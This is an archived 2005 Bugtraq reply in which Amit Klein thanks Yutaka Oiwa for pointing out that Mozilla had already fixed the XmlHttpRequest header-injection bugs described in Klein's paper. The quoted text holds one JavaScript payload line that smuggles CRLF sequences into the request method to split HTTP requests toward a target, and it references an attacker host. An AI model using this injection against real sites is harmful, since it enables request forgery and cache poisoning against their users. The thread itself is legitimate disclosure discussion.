[40499] in bugtraq
Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein
daemon@ATHENA.MIT.EDU (Amit Klein (AKsecurity))
Wed Sep 28 11:47:04 2005
Date: Wed, 28 Sep 2005 18:06:49 +0200
From: "Amit Klein (AKsecurity)" <aksecurity@hotpop.com>
In-reply-to: <87wtl21ygs.fsf@bluewind.rcis.aist.go.jp>
To: bugtraq@securityfocus.com, Yutaka OIWA <y.oiwa@aist.go.jp>
Message-id: <433ADBB9.11052.285BC9@localhost>
MIME-version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
On 27 Sep 2005 at 21:34, Yutaka OIWA wrote:
> Hello Amit,
>
> "Amit Klein (AKsecurity)" <aksecurity@hotpop.com> writes:
>
> > x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
> > /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
> > .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
> > /1.0\r\nFoobar:","http://www.attacker.site/",false);
>
> This kind of bugs are already fixed in recent Mozilla browsers,
> as shown in your reference [4].
>
> > [4] "setRequestHeader can be exploited using newline characters",
> > Bugzilla bug 297078
> > https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and
> > "XMLHttpRequest allows dangerous request headers to be set",
> > Bugzilla bug 302263
> > https://bugzilla.mozilla.org/show_bug.cgi?id=302263
>
> see comment #15 of bug 297078.
>
> https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15
>
Oh. I missed this. So - very good. And thanks for bringing this to Bugtraq's and mine
attention. And while we're here - kudos for your work!
-Amit
